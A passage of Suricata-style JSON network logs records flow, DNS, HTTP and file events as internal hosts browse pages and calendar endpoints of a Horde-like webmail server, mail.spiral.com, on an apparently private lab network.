{"timestamp":"2020-02-29T00:05:07.000500+0000","flow_id":223959634101441,"event_type":"flow","src_ip":"192.168.10.130","src_port":34724,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":11,"pkts_toclient":10,"bytes_toserver":1291,"bytes_toclient":7935,"start":"2020-02-29T00:03:59.345281+0000","end":"2020-02-29T00:04:06.663673+0000","age":7,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:05:07.362761+0000","flow_id":871962829359369,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":37139,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":64893,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:05:07.471041+0000","flow_id":871962829359369,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":37139,"proto":"UDP","dns":{"type":"answer","id":64893,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:05:07.471041+0000","flow_id":871962829359369,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":37139,"proto":"UDP","dns":{"type":"answer","id":64893,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:05:07.707629+0000","flow_id":579007405056244,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34738,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/search.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6129}} {"timestamp":"2020-02-29T00:05:08.000161+0000","event_type":"stats","stats":{"uptime":13960,"capture":{"kernel_packets":133341,"kernel_drops":0},"decoder":{"pkts":133370,"bytes":92349561,"invalid":181,"ipv4":131929,"ipv6":8,"ethernet":133370,"raw":0,"null":0,"sll":0,"tcp":126850,"udp":4884,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":692,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097920},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2698,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2714,"synack":2705,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1741,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2226,"failed_udp":110},"tx":{"http":4522,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2303}},"flow_mgr":{"closed_pruned":2679,"new_pruned":15,"est_pruned":2266,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":23147,"memcap_state":0,"memcap_global":0},"http":{"memuse":160851,"memcap":0}}} {"timestamp":"2020-02-29T00:05:09.227475+0000","flow_id":1750343770728430,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52686,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/themes\/default\/graphics\/search.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/mnemo\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":460},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/themes\/default\/graphics\/search.png","state":"CLOSED","stored":false,"size":460,"tx_id":0}} {"timestamp":"2020-02-29T00:05:09.311665+0000","flow_id":1969571786109511,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52684,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/themes\/default\/graphics\/favicon.ico","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/vnd.microsoft.icon","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1742},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/themes\/default\/graphics\/favicon.ico","state":"CLOSED","stored":false,"size":1742,"tx_id":6}} {"timestamp":"2020-02-29T00:05:10.000306+0000","flow_id":1310461790902159,"event_type":"flow","src_ip":"192.168.10.122","src_port":44297,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:00:09.579471+0000","end":"2020-02-29T00:00:09.690288+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:05:12.708607+0000","flow_id":579007405056244,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34738,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/search.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6129},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":30702,"tx_id":0}} {"timestamp":"2020-02-29T00:05:13.000243+0000","flow_id":2128300873612889,"event_type":"flow","src_ip":"192.168.10.122","src_port":33617,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:00:11.917081+0000","end":"2020-02-29T00:00:12.027870+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:05:13.280490+0000","flow_id":212195723528106,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":46499,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":34980,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:05:13.388520+0000","flow_id":212195723528106,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46499,"proto":"UDP","dns":{"type":"answer","id":34980,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:05:13.388520+0000","flow_id":212195723528106,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46499,"proto":"UDP","dns":{"type":"answer","id":34980,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:05:13.456437+0000","flow_id":342874398464368,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34740,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3339}} {"timestamp":"2020-02-29T00:05:15.000206+0000","event_type":"stats","stats":{"uptime":13967,"capture":{"kernel_packets":133393,"kernel_drops":0},"decoder":{"pkts":133399,"bytes":92358527,"invalid":181,"ipv4":131956,"ipv6":8,"ethernet":133399,"raw":0,"null":0,"sll":0,"tcp":126875,"udp":4886,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":692,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098496},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2699,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2715,"synack":2706,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1742,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2227,"failed_udp":110},"tx":{"http":4523,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2304}},"flow_mgr":{"closed_pruned":2680,"new_pruned":15,"est_pruned":2267,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":22818,"memcap_state":0,"memcap_global":0},"http":{"memuse":74797,"memcap":0}}} {"timestamp":"2020-02-29T00:05:17.000247+0000","flow_id":859219642302663,"event_type":"flow","src_ip":"192.168.10.122","src_port":44592,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:00:16.606407+0000","end":"2020-02-29T00:00:16.717444+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:05:18.000715+0000","flow_id":1375826898671631,"event_type":"flow","src_ip":"192.168.10.122","src_port":34211,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:00:17.808975+0000","end":"2020-02-29T00:00:17.914037+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:05:18.458620+0000","flow_id":342874398464368,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34740,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3339},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/","state":"CLOSED","stored":false,"size":16766,"tx_id":0}} {"timestamp":"2020-02-29T00:05:22.000735+0000","event_type":"stats","stats":{"uptime":13974,"capture":{"kernel_packets":133419,"kernel_drops":0},"decoder":{"pkts":133419,"bytes":92364099,"invalid":181,"ipv4":131974,"ipv6":8,"ethernet":133419,"raw":0,"null":0,"sll":0,"tcp":126891,"udp":4888,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":692,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097920},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2700,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2716,"synack":2707,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1743,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2228,"failed_udp":110},"tx":{"http":4524,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2305}},"flow_mgr":{"closed_pruned":2680,"new_pruned":15,"est_pruned":2270,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":22157,"memcap_state":0,"memcap_global":0},"http":{"memuse":39940,"memcap":0}}} {"timestamp":"2020-02-29T00:05:23.000408+0000","flow_id":568154018685187,"event_type":"flow","src_ip":"192.168.10.130","src_port":34726,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":18,"pkts_toclient":19,"bytes_toserver":3325,"bytes_toclient":14106,"start":"2020-02-29T00:04:06.663811+0000","end":"2020-02-29T00:04:22.205376+0000","age":16,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:05:23.472786+0000","flow_id":374562667837138,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":41142,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":35915,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:05:23.581640+0000","flow_id":374562667837138,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41142,"proto":"UDP","dns":{"type":"answer","id":35915,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:05:23.581640+0000","flow_id":374562667837138,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41142,"proto":"UDP","dns":{"type":"answer","id":35915,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:05:23.743422+0000","flow_id":83501324109156,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34742,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6897}} {"timestamp":"2020-02-29T00:05:28.745767+0000","flow_id":83501324109156,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34742,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6897},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":35877,"tx_id":0}} {"timestamp":"2020-02-29T00:05:29.000140+0000","event_type":"stats","stats":{"uptime":13981,"capture":{"kernel_packets":133423,"kernel_drops":0},"decoder":{"pkts":133438,"bytes":92373299,"invalid":181,"ipv4":131993,"ipv6":8,"ethernet":133438,"raw":0,"null":0,"sll":0,"tcp":126908,"udp":4890,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":692,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098208},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2701,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2717,"synack":2708,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1744,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2229,"failed_udp":110},"tx":{"http":4525,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2306}},"flow_mgr":{"closed_pruned":2681,"new_pruned":15,"est_pruned":2270,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":22488,"memcap_state":0,"memcap_global":0},"http":{"memuse":69495,"memcap":0}}} {"timestamp":"2020-02-29T00:05:29.001158+0000","flow_id":1313463988770583,"event_type":"flow","src_ip":"192.168.10.130","src_port":34728,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":34,"pkts_toclient":37,"bytes_toserver":4254,"bytes_toclient":39885,"start":"2020-02-29T00:04:09.251671+0000","end":"2020-02-29T00:04:28.151570+0000","age":19,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:05:29.002872+0000","flow_id":1115796709773253,"event_type":"flow","src_ip":"192.168.10.81","src_port":52682,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"failed","app_proto_tc":"http","flow":{"pkts_toserver":9,"pkts_toclient":13,"bytes_toserver":1099,"bytes_toclient":10025,"start":"2020-02-29T00:04:23.528325+0000","end":"2020-02-29T00:04:28.933275+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:05:29.640045+0000","flow_id":893553631413293,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":51580,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":43519,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:05:29.748633+0000","flow_id":893553631413293,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51580,"proto":"UDP","dns":{"type":"answer","id":43519,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:05:29.748633+0000","flow_id":893553631413293,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51580,"proto":"UDP","dns":{"type":"answer","id":43519,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:05:30.304068+0000","flow_id":893085479963979,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34744,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24343}} {"timestamp":"2020-02-29T00:05:30.445906+0000","flow_id":893085479963979,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34744,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24343},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/","state":"TRUNCATED","stored":false,"size":106496,"tx_id":0}} {"timestamp":"2020-02-29T00:05:30.454866+0000","flow_id":1021062620573906,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":33976,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":4505,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:05:30.563509+0000","flow_id":1021062620573906,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":33976,"proto":"UDP","dns":{"type":"answer","id":4505,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:05:30.563509+0000","flow_id":1021062620573906,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":33976,"proto":"UDP","dns":{"type":"answer","id":4505,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:05:30.623204+0000","flow_id":893085479963979,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34744,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":639}} {"timestamp":"2020-02-29T00:05:30.623204+0000","flow_id":893085479963979,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34744,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":639},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listCalendars","state":"CLOSED","stored":false,"size":29,"tx_id":1}} {"timestamp":"2020-02-29T00:05:30.655250+0000","flow_id":893085479963979,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34744,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":639},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listCalendars","state":"CLOSED","stored":false,"size":1656,"tx_id":1}} {"timestamp":"2020-02-29T00:05:30.670217+0000","flow_id":113437246634505,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":41347,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":43045,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:05:30.778890+0000","flow_id":113437246634505,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41347,"proto":"UDP","dns":{"type":"answer","id":43045,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:05:30.778890+0000","flow_id":113437246634505,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41347,"proto":"UDP","dns":{"type":"answer","id":43045,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:05:30.841339+0000","flow_id":214948798715515,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":60298,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":38798,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:05:30.949739+0000","flow_id":214948798715515,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":60298,"proto":"UDP","dns":{"type":"answer","id":38798,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:05:30.949739+0000","flow_id":214948798715515,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":60298,"proto":"UDP","dns":{"type":"answer","id":38798,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:05:30.985302+0000","flow_id":263627957994143,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34746,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126}} {"timestamp":"2020-02-29T00:05:30.985302+0000","flow_id":263627957994143,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34746,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 